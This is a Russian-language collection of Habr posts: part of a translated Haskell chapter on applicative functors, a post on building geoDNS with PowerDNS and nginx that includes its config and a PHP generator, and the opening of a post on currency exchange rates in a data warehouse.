При использовании `Maybe` и `[]` мы могли бы воспринимать применение функции `<*>` как просто извлечение функции из ее левого параметра, а затем применение ее к правому параметру. В отношении `IO` извлечение остается в силе, но теперь у нас появляется понятие помещения в последовательность, поскольку мы берем два действия ввода-вывода и склеиваем их в одно. Мы должны извлечь функцию из первого действия ввода-вывода, но для того, чтобы извлечь результат из действия ввода-вывода, последнее должно быть выполнено. Рассмотрите вот это:
```
myAction :: IO String
myAction = do
a <- getLine
b <- getLine
return $ a ++ b
```
Это действие ввода-вывода, которое запросит у пользователя две строки и вернет в качестве своего результата конкатенацию этих двух строк. Мы достигли это благодаря склеиванию вместе двух действий ввода-вывода `getLine` и `return`, поскольку мы хотели чтобы наше новое склеенное действие ввода-вывода содержало результат выполнения `a ++ b`. Еще один способ записать это состоит в использовании аппликативного стиля:
```
myAction :: IO String
myAction = (++) <$> getLine <*> getLine
```
Это то же, что мы делали ранее, когда мы создавали действие ввода-вывода, которое применяло функцию между результатами двух других действий ввода-вывода. Вспомните, что `getLine` — это действие ввода-вывода, которое имеет тип `getLine :: IO String`. Когда мы применяем `<*>` между двумя аппликативными значениями, результатом является аппликативное значение, так что все это имеет смысл.
Если мы вернёмся к аналогии с коробками, мы можем представить себе `getLine` как коробку, которая выйдет в реальный мир и принесёт нам строку. Выполнение `(++) <$> getLine <*> getLine` создаёт другую, бо'льшую коробку, которая посылает эти две коробки наружу для получения строк с терминала, а потом возвращает конкатенацию этих двух строк в качестве своего результата.
Выражение `(++) <$> getLine <*> getLine` имеет тип `IO String`. Это означает, что данное выражение является совершенно обычным действием ввода-вывода, как и любое другое, тоже возвращая результирующее значение, как и другие действия ввода-вывода. Вот почему мы можем выполнять подобные вещи:
```
main = do
a <- (++) <$> getLine <*> getLine
putStrLn $ "The two lines concatenated turn out to be: " ++ a
```
### Функции в качестве аппликативных функторов
Еще одним экземпляром `Applicative` является `(->) r` или функции. Мы не часто используем функции в аппликативном стиле, но концепция тем не менее действительно интересна, поэтому давайте взглянем, как реализован экземпляр функции.
```
instance Applicative ((->) r) where
pure x = (\_ -> x)
f <*> g = \x -> f x (g x)
```
Когда мы оборачиваем значение в аппликативное значение с помощью `pure`, результат, который оно возвращает, должен быть этим значением. Минимальный контекст по умолчанию по-прежнему возвращает это значение в качестве результата. Вот почему в реализации экземпляра функции `pure` принимает значение и создает функцию, которая игнорирует передаваемый ей параметр и всегда возвращает это значение. Тип `pure` для экземпляра `(->) r` выглядит как `pure :: a -> (r -> a)`.
```
ghci> (pure 3) "blah"
3
```
Из-за каррирования применение функции левоассоциативно, так что мы можем опустить скобки:
```
ghci> pure 3 "blah"
3
```
Реализация экземпляра `<*>` немного загадочна, поэтому давайте посмотрим, как использовать функции в качестве аппликативных функторов в аппликативном стиле:
```
ghci> :t (+) <$> (+3) <*> (*100)
(+) <$> (+3) <*> (*100) :: (Num a) => a -> a
ghci> (+) <$> (+3) <*> (*100) $ 5
508
```
Вызов функции `<*>` с двумя аппликативными значениями возвращает аппликативное значение, поэтому если мы вызываем ее с двумя функциями, мы получаем функцию. Что же здесь происходит? Когда мы выполняем `(+) <$> (+3) <*> (*100)`, мы создаем функцию, которая применит `+` к результатам выполнения функций `(+3)` и `(*100)` и вернет это значение. При вызове `(+) <$> (+3) <*> (*100) $ 5`, `(+3)` и `(*100)` сначала применяются к `5`, что в результате дает `8` и `500`. Затем `+` вызывается со значениями `8` и `500`, что в результате дает `508`.
Следующий код аналогичен:
```
ghci> (\x y z -> [x,y,z]) <$> (+3) <*> (*2) <*> (/2) $ 5
[8.0,10.0,2.5]
```
 Мы создаем функцию, которая вызовет функцию `\x y z -> [x, y, z]` с окончательными результатами выполнения, возвращенными функциями `(+3)`, `(*2)` и `(/2)`. `5` передается каждой из трех функций, а затем с этими результатами вызывается `\x y z -> [x, y, z]`.
**ПРИМЕЧАНИЕ**: *Не так уж важно, поняли ли вы, как работает экземпляр `(->) r` для `Applicative`, так что не отчаивайтесь, если вам это не понятно сейчас. Поиграйте с аппликативным стилем и функциями, чтобы получить некоторое представление о том, как использовать функций в качестве аппликативных функторов.*
### Застегиваемые списки
Оказывается, есть и другие способы для списков быть аппликативными функторами. Один способ мы уже рассмотрели: вызов `<*>` со списком функций и списком значений, который возвращает список всех возможных комбинаций применения функций из левого списка к значениям в списке справа.
Например, если мы выполним `[(+3),(*2)] <*> [1,2]`, функция `(+3)` будет применена и к `1` и к `2`, и функция `(*2)` также будет применена и к `1` и к `2`, результатом чего будет список из четырех элементов: `[4,5,2,4]`. Однако, `[(+3),(*2)] <*> [1,2]` могла бы также работать таким образом, чтобы первая функция в списке слева была бы применена к первому значению в списке справа, вторая функция была бы применена ко второму значению, и т. д. Это вернуло бы список с двумя значениями: `[4,4]`. Вы могли бы представить его как `[1 + 3, 2 * 2]`.
Экземпляром `Applicative`, с которым мы еще не встречались, является `ZipList`, и живет он в `Control.Applicative`.
Поскольку один тип не может иметь два экземпляра для одного и того же класса типов, был введен тип `ZipList a`, в котором имеется один конструктор `(ZipList)` с единственным полем (список). Вот экземпляр:
```
instance Applicative ZipList where
pure x = ZipList (repeat x)
ZipList fs <*> ZipList xs = ZipList (zipWith (\f x -> f x) fs xs)
```
`<*>` применяет первую функцию к первому значению, вторую функцию — ко второму значению, и т. д. Это делается с помощью `zipWith (\f x -> f x) fs xs`. Ввиду особенностей работы `zipWith` окончательный список будет той же длины, что и более короткий список из двух.
`pure` здесь также интересна. Она берет значение и помещает его в список, в котором это значение просто повторяется бесконечно. `pure "haha"` вернет `ZipList (["haha","haha","haha"...`. Это могло бы сбить с толку, поскольку вы узнали, что `pure` должна помещать значение в минимальный контекст, который по-прежнему возвращает это значение. И вы могли бы подумать, что бесконечный список чего-либо едва ли является минимальным. Но это имеет смысл при использовании застегиваемых списков, так как значение должно производиться в каждой позиции. Это также удовлетворяет закону о том, что `pure f <*> xs` должно быть эквивалентно `fmap f xs`. Если бы вызов `pure 3` просто вернул `ZipList [3]`, вызов `pure (*2) <*> ZipList [1,5,10]` дал бы в результате `ZipList [2]`, потому что длина результирующего списка из двух застегнутых списков равна длине более короткого списка из двух. Если мы застегнем конечный список с бесконечным, длина результирующего списка всегда будет равна длине конечного списка.
Так как же застегиваемые списки работают в аппликативном стиле? Давайте посмотрим. Ладно, тип `ZipList a` не имеет экземпляра `Show`, поэтому мы должны использовать функцию `getZipList` для извлечения сырого списка из застегиваемого списка:
```
ghci> getZipList $ (+) <$> ZipList [1,2,3] <*> ZipList [100,100,100]
[101,102,103]
ghci> getZipList $ (+) <$> ZipList [1,2,3] <*> ZipList [100,100..]
[101,102,103]
ghci> getZipList $ max <$> ZipList [1,2,3,4,5,3] <*> ZipList [5,3,1,2]
[5,3,3,4]
ghci> getZipList $ (,,) <$> ZipList "dog" <*> ZipList "cat" <*> ZipList "rat"
[('d','c','r'),('o','a','a'),('g','t','t')]
```
**ПРИМЕЧАНИЕ**: *Функция `(,,)` — это то же самое, что `\x y z -> (x,y,z)`. Также, функция `(,)` — это же самое, что `\x y -> (x,y)`.*
Помимо `zipWith` в стандартной библиотеке есть такие функции, как `zipWith3`, `zipWith4`, вплоть до `7`. `zipWith` берет функцию, которая принимает два параметра, и застегивает с ее помощью два списка. `zipWith3` берет функцию, которая принимает три параметра, и застегивает с ее помощью три списка, и т. д. При использовании застегиваемых списков в аппликативном стиле нам не нужно иметь отдельную функцию застегивания для каждого числа списков, которые мы хотим застегнуть друг с другом. Мы просто используем аппликативный стиль для застегивания произвольного количества списков друг с другом при помощи функции, и это очень удобно.
### Аппликативные законы
Как и обычные функторы, аппликативные функторы несут с собой несколько законов. Самый главный закон состоит в том, чтобы выполнялось `pure f <*> x = fmap f x`. В качестве упражнения вы можете доказать выполнение этого закона для некоторых аппликативных функторов в этой главе. Ниже перечислены другие аппликативные законы:
* `pure id <*> v = v`
* `pure (.) <*> u <*> v <*> w = u <*> (v <*> w)`
* `pure f <*> pure x = pure (f x)`
* `u <*> pure y = pure ($ y) <*> u`
Мы не будем рассматривать их подробно, потому что это заняло бы много страниц и было бы несколько скучно. Если вам интересно, вы можете познакомиться с ними поближе и посмотреть, выполняются ли они для некоторых экземпляров.
Полезные функции для работы с аппликативными функторами
-------------------------------------------------------
`Control.Applicative` определяет функцию, которая называется `liftA2` и имеет следующий тип:
```
liftA2 :: (Applicative f) => (a -> b -> c) -> f a -> f b -> f c
```
Она определена вот так:
```
liftA2 :: (Applicative f) => (a -> b -> c) -> f a -> f b -> f c
liftA2 f a b = f <$> a <*> b
```
Она просто применяет функцию между двумя аппликативными значениями, скрывая при этом аппликативный стиль, который мы обсуждали. Однако она ясно демонстрирует, почему аппликативные функторы более мощны по сравнению с обычными функторами.
При использовании обыкновенных функторов мы можем просто отображать одно значение функтора с помощью функций. При использовании аппликативных функторов мы можем применять функцию между несколькими значениями функторов. Интересно также воспринимать тип этой функции в виде `(a -> b -> c) -> (f a -> f b -> f c)`. Когда мы его воспринимаем подобным образом, мы можем сказать, что `liftA2` берет обычную бинарную функцию и переводит ее в функцию, которая работает с двумя аппликативными значениями.
Есть интересная концепция: мы можем взять два аппликативных значения и объединить их в одно аппликативное значение, которое содержит в себе результаты этих двух аппликативных значений в списке. Например, у нас есть `Just 3` и `Just 4`. Предположим, что второй функтор содержит одноэлементный список, так как это очень легко достичь:
```
ghci> fmap (\x -> [x]) (Just 4)
Just [4]
```
Хорошо, скажем, у нас есть `Just 3` и `Just [4]`. Как нам получить `Just [3,4]`? Это просто:
```
ghci> liftA2 (:) (Just 3) (Just [4])
Just [3,4]
ghci> (:) <$> Just 3 <*> Just [4]
Just [3,4]
```
Вспомните, что `:` — это функция, которая принимает элемент и список и возвращает новый список с этим элементом в начале. Теперь, когда у нас есть `Just [3,4]`, могли бы ли мы объединить это с `Just 2`, чтобы произвести `Just [2,3,4]`? Да, могли бы. Похоже, мы можем объединять любое количество аппликативных значений в одно аппликативное значение, которое содержит в себе список результатов этих аппликативных значений.
Давайте попробуем реализовать функцию, которая принимает список аппликативных значений и возвращает аппликативное значение, которое содержит список в качестве своего результирующего значения. Мы назовем ее `sequenceA`:
```
sequenceA :: (Applicative f) => [f a] -> f [a]
sequenceA [] = pure []
sequenceA (x:xs) = (:) <$> x <*> sequenceA xs
```
Аа, рекурсия! Прежде всего смотрим на тип. Он трансформирует список аппликативных значений в аппликативное значение со списком. После этого мы можем заложить некоторую основу для базового случая. Если мы хотим превратить пустой список в аппликативное значение со списком результатов, мы просто помещаем пустой список в контекст по умолчанию. Теперь в дело вступает рекурсия. Если у нас есть список с головой и хвостом (вспомните, `x` — это аппликативное значение, а `xs` — это список, состоящий из них), мы вызываем `sequenceA` с хвостом, что возвращает аппликативное значение со списком внутри него. Затем мы просто предваряем значением, содержащимся внутри аппликативного значения `x`, список, находящийся внутри этого аппликативного значения, вот именно!
Предположим, мы выполняем это:
```
sequenceA [Just 1, Just 2]
```
По определению это эквивалентно следующему:
```
(:) <$> Just 1 <*> sequenceA [Just 2]
```
Разбивая это далее, мы получаем:
```
(:) <$> Just 1 <*> ((:) <$> Just 2 <*> sequenceA [])
```
Мы знаем, что вызов `sequenceA []` оканчивается в виде `Just []`, поэтому данное выражение теперь выглядит следующим образом:
```
(:) <$> Just 1 <*> ((:) <$> Just 2 <*> Just [])
```
что аналогично этому:
```
(:) <$> Just 1 <*> Just [2]
```
что равно `Just [1,2]`!
Другой способ реализации `sequenceA` — это использование свертки. Вспомните, что почти любая функция, где мы проходим по списку элемент за элементом и попутно накапливаем результат, может быть реализована с помощью свертки:
```
sequenceA :: (Applicative f) => [f a] -> f [a]
sequenceA = foldr (liftA2 (:)) (pure [])
```
Мы проходим список с конца, начиная со значением аккумулятора, равным `pure []`. Мы применяем `liftA2 (:)` между аккумулятором и последним элементом списка, что дает в результате аппликативное значение, содержащее в себе одноэлементный список. Затем мы вызываем `liftA2 (:)` с текущим в данный момент последним элементом и текущим аккумулятором, и т. д., до тех пор, пока у нас не останется только аккумулятор, который содержит список результатов всех аппликативных значений.
Давайте попробуем применить нашу функцию к какими-нибудь аппликативным значениям:
```
ghci> sequenceA [Just 3, Just 2, Just 1]
Just [3,2,1]
ghci> sequenceA [Just 3, Nothing, Just 1]
Nothing
ghci> sequenceA [(+3),(+2),(+1)] 3
[6,5,4]
ghci> sequenceA [[1,2,3],[4,5,6]]
[[1,4],[1,5],[1,6],[2,4],[2,5],[2,6],[3,4],[3,5],[3,6]]
ghci> sequenceA [[1,2,3],[4,5,6],[3,4,4],[]]
[]
```
При использовании со значениями `Maybe`, `sequenceA` создает значение `Maybe`, содержащее в себе все результаты в виде списка. Если одно из значений равно `Nothing`, тогда результатом тоже является `Nothing`. Это круто, когда у вас есть список значений `Maybe`, и вы заинтересованы в значениях только когда ни одно из них не равно `Nothing`.
При применении к функциям, `sequenceA` принимает список функций и возвращает функцию, которая возвращает список. В нашем примере мы создали функцию, которая приняла число в качестве параметра и применила его к каждой функции в списке, а затем вернула список результатов. `sequenceA [(+3),(+2),(+1)] 3` вызовет `(+3)` с параметром `3`, `(+2)` — с параметром `3`, и `(+1)` — с параметром `3`, и вернет все эти результаты в виде списка.
Выполнение `(+) <$> (+3) <*> (*2)` создаст функцию, которая принимает параметр, передает его и `(+3)` и `(*2)`, а затем вызывает `+` с этими двумя результатами. В том же духе, есть смысл в том, что `sequenceA [(+3),(*2)]` создает функцию, которая принимает параметр и передает его всем функциям в списке. Вместо вызова `+` с результатами функций используется сочетание `:` и `pure []` для накопления этих результатов в список, который является результатом этой функции.
Использование `sequenceA` полезно, когда у нас есть список функций и мы хотим передать им всем один и тот же ввод, а затем просмотреть список результатов. Например, у нас есть число и нам интересно, удовлетворяет ли оно всем предикатам в списке. Вот один из способов сделать это:
```
ghci> map (\f -> f 7) [(>4),(<10),odd]
[True,True,True]
ghci> and $ map (\f -> f 7) [(>4),(<10),odd]
True
```
Вспомните, что and принимает список значений типа `Bool` и возвращает `True`, если все они равны `True`. Еще один способ достичь такой же результат — это применение `sequenceA`:
```
ghci> sequenceA [(>4),(<10),odd] 7
[True,True,True]
ghci> and $ sequenceA [(>4),(<10),odd] 7
True
```
sequenceA [(>4),(<10),odd] создает функцию, которая примет число и передаст его всем предикатам в `[(>4),(<10),odd]`, и вернет список булевых значений. Она превращает список с типом `(Num a) => [a -> Bool]` в функцию с типом `(Num a) => a -> [Bool]`. Очень клёво, правда?
Поскольку списки однородны, все функции в списке должны быть одного и того же типа, конечно же. Вы не можете получить список вроде `[ord, (+3)]`, потому что `ord` принимает символ и возвращает число, тогда как `(+3)` принимает число и возвращает число.
При использовании с `[]`, `sequenceA` принимает список списков и возвращает список списков. На самом деле она создает списки, которые содержат все комбинации находящихся в них элементов. Для иллюстрации, вот предыдущий пример, выполненный с применением `sequenceA`, а затем выполненный с помощью генератора списков:
```
ghci> sequenceA [[1,2,3],[4,5,6]]
[[1,4],[1,5],[1,6],[2,4],[2,5],[2,6],[3,4],[3,5],[3,6]]
ghci> [[x,y] | x <- [1,2,3], y <- [4,5,6]]
[[1,4],[1,5],[1,6],[2,4],[2,5],[2,6],[3,4],[3,5],[3,6]]
ghci> sequenceA [[1,2],[3,4]]
[[1,3],[1,4],[2,3],[2,4]]
ghci> [[x,y] | x <- [1,2], y <- [3,4]]
[[1,3],[1,4],[2,3],[2,4]]
ghci> sequenceA [[1,2],[3,4],[5,6]]
[[1,3,5],[1,3,6],[1,4,5],[1,4,6],[2,3,5],[2,3,6],[2,4,5],[2,4,6]]
ghci> [[x,y,z] | x <- [1,2], y <- [3,4], z <- [5,6]]
[[1,3,5],[1,3,6],[1,4,5],[1,4,6],[2,3,5],[2,3,6],[2,4,5],[2,4,6]]
```
`(+) <$> [1,2] <*> [4,5,6]` возвращает в результате недетерминированное вычисление `x + y`, где `x` принимает каждое значение из `[1,2]`, а `y` принимает каждое значение из `[4,5,6]`. Мы представляем это в виде списка, который содержит все возможные результаты. Аналогичным образом, когда мы выполняем `sequenceA [[1,2],[3,4],[5,6]]`, результатом является недетерминированное вычисление `[x,y,z]`, где `x` принимает каждое значение из `[1,2]`, а `y` принимает каждое значение из `[3,4]` и т. д. Для представления результата этого недетерминированного вычисления мы используем список, где каждый элемент в списке является одним возможным списком. Вот почему результатом является список списков.
При использовании с действиями ввода-вывода, `sequenceA` — это то же самое, что и `sequence`! Она принимает список действий ввода-вывода и возвращает действие ввода-вывода, которое выполнит каждое из этих действий и в качестве своего результата будет содержать список результатов этих действий ввода-вывода. Это так, потому что чтобы превратить значение `[IO a]` в значение `IO [a]`, чтобы создать действие ввода-вывода, возвращающее список результатов при выполнении, все эти действия ввода-вывода должны быть помещены в последовательность для того, чтобы затем быть выполненными одно за другим, когда потребуется результат выполнения. Вы не можете получить результат действия ввода-вывода, не выполнив его.
Давайте поместим три действия ввода-вывода `getLine` в последовательность:
```
ghci> sequenceA [getLine, getLine, getLine]
heyh
ho
woo
["heyh","ho","woo"]
```
В заключение, аппликативные функторы не просто интересны, но они также полезны. Они позволяют нам объединять разные вычисления — как, например, вычисления ввода-вывода, недетерминированные вычисления, вычисления, которые могли окончиться неуспешно, и т. д., — используя аппликативный стиль. Просто используя `<$>` и `<*>`, мы можем применять обычные функции, чтобы единообразно работать с любым количеством аппликативных функторов и использовать преимущества семантики каждого из них.
---
Переводы предыдущих глав книги, которые требуют полной переработки (структуры и содержания):
1. [Введение](http://translated.by/you/learn-you-a-haskell-for-great-good-chapter-introduction/into-ru/)
2. [Начало](http://translated.by/you/learn-you-a-haskell-for-great-good-chapter-starting-out-1/into-ru/)
3. [Типы и классы типов](http://translated.by/you/learn-you-a-haskell-for-great-good-chapter-types-and-typeclasses/into-ru/)
4. [Синтаксис функций](http://translated.by/you/learn-you-a-haskell-for-great-good-chapter-syntax-in-functions/into-ru/)
5. [Рекурсия](http://translated.by/you/learn-you-a-haskell-for-great-good/into-ru/)
6. [Функции высшего порядка](http://translated.by/you/learn-you-a-haskell-for-great-good-higher-order-functions/into-ru/)
7. [Модули](http://translated.by/you/learn-you-a-haskell-for-great-good-modules/into-ru/)
8. [Создание своих собственных типов и классов типов](http://translated.by/you/learn-you-a-haskell-for-great-good-making-our-own-types-and-typeclasses/into-ru/)
9. [Ввод-вывод](http://translated.by/you/learn-you-a-haskell-for-great-good-input-and-output/into-ru/)
10. [Функциональное решение задач](http://translated.by/you/izuchaj-haskell-radi-dobra-funktsional-noe-reshenie-problem/into-ru/)
Следующей на очереди к публикации — глава *[Моноиды](http://habrahabr.ru/blogs/Haskell/128586/)*. Пока надеюсь на конструктивные комментарии по улучшению содержания. Спасибо! | https://habr.com/ru/post/123767/ | null | ru | null |
# geoDNS с помощью Powerdns и nginx
Обожаю задачи “на стыке технологий”, это одна из таких.
Задача:
* реализовать geoDNS\*
* c возможностью wildcard (\*.some.tst. A 1.2.3.4)
* с возможностью менять содержимое зон на ходу, добавлять новые зоны пачками
* без необходимости запускать громоздкие скрипты на каждый запрос “мимо кеша”
* научиться тестить этот реактор (с локалхоста, а не кучи proxy/VDS)
\*) под geoDNS я подразумеваю возможность для клиентов из разных регионов отдавать разные, например, адреса сервера/А-записи (для США отдаётся IP сервера в США, для СНГ — в москве, для ЕС — в Европе ...)
Статья описывает
* метод реализации geoDNS
* метод тестирования
* эскизное решение на “чистом nginx”
Если интересно, причём же здесь nginx, прошу под кат.
Существующие решения ([патч для bind](http://www.caraytech.com/geodns/), [geo\_backend](http://doc.powerdns.com/html/geo.html) и [pipe\_backend](http://doc.powerdns.com/html/backends-detail.html#pipebackend) у powerdns), допустим, нас чем-то не устроили.
#### Метод реализации geoDNS
Powerdns(pdns) — [авторитативный dns сервер](http://powerdns.com), который имеет кучу (аж [15 штук](http://doc.powerdns.com/html/backends-detail.html)) бекендов (источников информации) от стандартных BIND-like до различных СУБД (MySQL, Oracle, PostgreSQL, sqlite), простого pipe и экзотики типа Lua, LDAP.
Бэкэнд выбирается глобально для всей инсталяции (нельзя 5 доменов на mysql, еще 5 на sqlite и т.д) так:
```
launch=remote
remote-connection-string=http:url=http://127.0.0.1:4343/dnsapi
```
При использовании [remote backend](http://doc.powerdns.com/html/remotebackend.html), pdns посылает на указанный сервер http-запрос и ожидает получить от онного http-ответ, содержащий данные в любимом web-разработчиками формате json
Как пример:
```
> GET /dnsapi/lookup/www.example.com/ANY HTTP/1.1
< {"result":[{"qtype":"A", "qname":"www.example.com", "content":"192.168.1.2", "ttl": 60}]}
```
Очевидно, что ставить за вебсервер какую-то динамику нельзя (слишком жирно будет, да и ddos через DNS довольно распространён), поэтому, пробуем реализовать логику DNS на чистом nginx, отдающем обычную статику.
На удивление, логика оказалась очень простая и ничего, кроме try\_files и rewrite не потребовалось, реализация geo составляющей усложнилось только на использование модуля [ngx\_http\_geo\_module](http://nginx.org/ru/docs/http/ngx_http_geo_module.html)
Потребовался немного хитровыдуманный генератор этой самой статики (см. ниже).
Будем хранить нашу зону (уже готовый заjson-еный ответ, без учёта geo-привязки) в файловой структуре вида
`/$1/$2$1_$3.jsn`
`$1` — зона
`$2` — поддомен (\_ в случае wildcard)
`$3` — тип запроса (например, A, CNAME,MX… ANY)
Пример: /domain.com/sub.domain.com\_A.jsn
Важное уточнение: логически доменное имя nextsub.sub.domain.com может быть
* самостоятельным доменом /nextsub.sub.domain.com/nextsub.sub.domain.com\_A.jsn
* поддоменом /sub.domain.com/nextsub.sub.domain.com\_A.jsn
* wildcard /sub.domain.com/\_sub.domain.com\_A.jsn
Поэтому перебрать нужно три варианта (укладываем в try\_files).
Если такого поддомена не нашлось, ищем выше(это не по RFC, да и практическая польза сомнительна): просто повторяем поиск для sub.domain.com (укладываем в rewrite)
Самое время вспомнить про geo-составляющую.
Тут всё просто, добавляем буквенный код геозоны: /domain.com/**def**/sub.domain.com\_A.jsn
#### Эскизное решение на чистом nginx
Костыль для wildcard: Важно понимать, что при wildcard запросе вида ddddd.domain.com мы должны отдать в ответе поддомен(а не \*.domain.com), на помощь приходит [ngx\_http\_sub\_module](http://nginx.org/ru/docs/http/ngx_http_sub_module.html), который заменяет %WC% в статике на запрошенный поддомен.
**Конфиг nginx**
```
# в хеадер X-remotebackend powerdns кладёт IP клиента
# определяем по нему геозону, результат откажется в переменной $src
geo $http_x_remotebackend_remote $src{
default def;
127.1.0.0/16 i0;
127.1.1.0/24 i1;
}
# формат лога, усиленный информацией о geo-зоне и IP клиента
log_format ns '$remote_addr - [$time_local] "$request" $status '
'"$http_user_agent" $http_x_remotebackend_real_remote '
' $http_x_remotebackend_real_remote $http_x_remotebackend_remote $http_x_remotebackend_local $src';
server {
listen 127.0.0.1:4343;
access_log /var/www/dns/logs/nginx.access.log ns;
error_log /var/www/dns/logs/nginx.error.log;
# Дебажить тут !
#rewrite_log on;
root /var/www/dns/store;
# в любой непонятной ситуации отдаём синтаксически-корректную ошибку.
error_page 403 /backend.jsn;
location / {
return 403;
}
location ~* ^/dnsapi/lookup/([^\.]+)\.([^/]*)/([a-z]+)$ {
#Для дебага через http
add_header X-geo $src;
sub_filter_types text/plain;
sub_filter "%WC%" $1.$2. ;
# Если вы хотите повторять поиск для домена более высокого уровня,
# уберите /empty.jsn
try_files /$2/$src/$1.$2_$3.jsn /$1.$2/$src/$1.$2_$3.jsn /$2/$src/_$2_$3.jsn
/$2/def/$1.$2_$3.jsn /$1.$2/def/$1.$2_$3.jsn /$2/def/_$2_$3.jsn
/empty.jsn @fallback;
# сначала пробуем найти ответ для определившейся геозоны ($src)
# если не нашлось, пробуем дефолтный.
index fallback.jsn;
limit_except GET {deny all;}
# ./nextsub.sub.domain.com/SOA
# sub.domain.com//nextsub.sub.domain.com\_SOA
# nextsub.sub.domain.com//nextsub.sub.domain.com\_SOA
# sub.domain.com//\_sub.domain.com\_SOA
# ./sub.domain.com/SOA
# ...
}
# идём на уровень выше.
location @fallback{
rewrite ^/dnsapi/lookup/([^\.]+)\.([^/]\*)/([a-z]+) /dnsapi/lookup/$2/$3;
}
} #server
```
#### Метод тестирования
Тут всё еще проще, обратите внимание, наши тестовые геозоны мы раздавали внутри 127.0.0.0/8, командам dig и wget можно запросто скормить нужный IP источника.
```
wget -q -S -O - --bind-address=127.1.0.2 http://127.0.0.1:4343/dnsapi/lookup/d.q.qq/A
dig -b 127.0.12.1 ANY q.qq @localhost
```
Для нашего случая всё отлично тестируется так:
```
# dig +short -b 127.0.0.1 A q.qq @localhost
1.1.1.1
# dig +short -b 127.1.0.1 A q.qq @localhost
127.0.0.1
# dig +short -b 127.1.1.1 A q.qq @localhost
127.1.99.123
```
#### Немного хитровыдуманный генератор
Есть немного такого кода, за который мне местами стыдно. Вот и он
**Генератор статики**
```
php
$empty=array();
define('TTL',3);
opt('empty',true,'empty');
opt('index','true','index');
opt('backend',false,'backend');
$zones=array();
//эталонная зона
$q=array();
$q[]=array('','NS','a.ns');
$q[]=array('','NS','b.ns');
$q[]=array('','A','1.1.1.1');
$q[]=array('www','CNAME','');
$q[]=array('*','A','3.2.1.4');
$q[]=array('','MX','mxs.ns',5);
$q[]=array('','SOA','a.ns domain.lazutov.net. 5 3600 3600 604800 0');
//запишем в дефолтный geo
$zones['q.qq']['def']=$q;
$q=unsetrr($q,'','A');
// и немного модифицируем для гео
$zones['q.qq']['i0']=$q;
$zones['q.qq']['i0'][]=array('','A','127.0.0.1');
$zones['q.qq']['i1']=$q;
$zones['q.qq']['i1'][]=array('','A','127.1.99.123');
foreach ($zones as $zone=$locdata){
foreach ($locdata as $loc=>$rrs){
$sub=array();
$all=$rrs;
// разложим зону "поподдоменно"
foreach ($rrs as $r){
if ($r[0]==='*'){
$sub['*'][]=$r;
} elseif ($r[0]==='') {
$sub['@'][]=$r;
} else {
$sub[$r[0]][]=$r;
}
}
// сформируем массив для записи в файлы и запишем.
foreach ($sub as $sd=>$rrs){
$rrs=formdata($zone,$rrs);
foreach ($rrs as $type=>$v) writedown($zone,$loc,$sd,$type,$v);
}
}
}
// пишем инфломацию о записях типа type поддомена sub зоны zone в гео loc
function writedown ($zone,$loc,$sub,$type,$data){
$fn="{$sub}.{$zone}";
if ($sub=='@') $fn=$zone;
elseif ($sub=='*') $fn='_'.$zone;
opt("{$zone}/{$loc}/{$fn}_{$type}",$data);
}
//формируем данные для записи в json (раскладываем по типам)
function formdata($zone,$rrs){
$r=array();
foreach ($rrs as $rr){
$qname=(empty($rr[0])?$zone:"{$rr[0]}.{$zone}");
$pr=(empty($rr[3])?0:intval($rr[3]));
$c=(empty($rr[2])?$zone:$rr[2]);
$rd=array('qname'=>$qname,'qtype'=>$rr[1],'content'=>$c,'ttl'=>TTL,'priority'=>$pr,'domain_id'=>-1);
if ($rr[0]==='*' AND $rd['qtype']!=='ANY') $rd['qname']='%WC%';
$r[$rr[1]][]=$rd;
$r['ANY'][]=$rd;
}
return $r;
}
function unsetrr($data,$src,$type){
foreach ($data as $k=>$v) if ($v[0]===$src and $v[1]===$type) unset($data[$k]);
return $data;
}
// типа OutPuT данных data в файл file с комментом add
function opt($file,$data,$add=NULL){
$r=array('result'=>$data);
if (!empty($add)) $r['desc']=$add;
$dir=dirname(__FILE__);
$cd=dirname($dir.'/'.$file) ;
//echo "{$cd}\n";
if (!is_dir($cd)) mkdir($cd );
file_put_contents($dir.'/'.$file.'.jsn',json_encode($r) );
}
```
Плюсы данного решения:
* “Горячее” добавление/изменение
* Отдача статики через nginx хорошо изучена и довольно проста
* nginx\_geo хорошо изучен и документирован
* Масштабируется горизонтальненько добалением новых сначала воркеров pdns, а затем серверов связки pdns+nginx
* Допиливается под ваши нужды синтаксисом конфигов nginx
Но я не считаю его готовым к использованию в боевых условиях и вот почему:
* remote\_backend пока что unstable и pdns нужно [прересобрать из транка](http://doc.powerdns.com/html/remotebackend.html#remotebackend-compiling) с его поддержкой
* я даже не смотрел в RFC
Спасибо за внимание!
Вопросы прошу направлять в комментарии, а опечатки — в личку.
Желающие попиарить свой DNS сервис пожалуйста, проследуйте в [свой двор](http://habrahabr.ru/hub/i_am_advertising/), извините. | https://habr.com/ru/post/178727/ | null | ru | null |
# Курсы валют и аналитика – использование обменных курсов в Хранилище Данных
Привет! На связи Артемий – Analytics Engineer.
Сегодня хотел бы поговорить о вопросах конвертирования финансовых показателей в разные валюты. Вопрос достаточно актуальный, так как большое количество компаний имеют мультинациональные зоны присутствия, строят аналитику глобального масштаба, готовят отчетность по международным стандартам.
Покажу как этот вопрос решается с помощью современных подходов на примере кейса:
* Расширение списка базовых валют
* Регулярное обновление и получения актуальных курсов
* Обеспечение корректности исторических показателей
* Максимальное удобство и простота использования в аналитических инструментах
Велком под кат для разбора решения проблемы учета мультивалютных метрик и показателей: Open Exchange Rates, Airflow, Redshift Spectrum, dbt.
---
### Новые требования к сервису валютных курсов
В качестве legacy-источника использовался [веб-сервис ЦБ РФ](https://www.cbr.ru/development/DWS/). Однако с изменяющимися требованиями и расширением зон присутствия компании его стало недостаточно. Например, по причине отсутствия котировки AED (дирхам ОАЭ). Для кого-то могут быть актуальны курсы криптовалют BTC, ETH, которые в веб-сервисе ЦБ РФ тоже отсутствуют.
Новые требования можно суммировать следующим образом:
* Поддержка расширенного набора базовых валют, которые отсутствуют в API ЦБ РФ
* Получение самых актуальных котировок, включая внутридневные курсы
* Минимизация трансформаций данных вне Хранилища Данных (лучше если их вообще нет)
Матрица новых требований к работе с курсами валютЗадачи, которые предстоит решить легко визуализировать в виде матрицы. Красным помечены области, поддержку которых предстоит добавить:
* Интеграция нового API для уже использующихся курсов
* Добавление новых базовых валют в выгрузку
* Получение ретроспективных (исторических) данных по новым валютам за прошлые периоды
* Архивирование курсов из legacy-источника
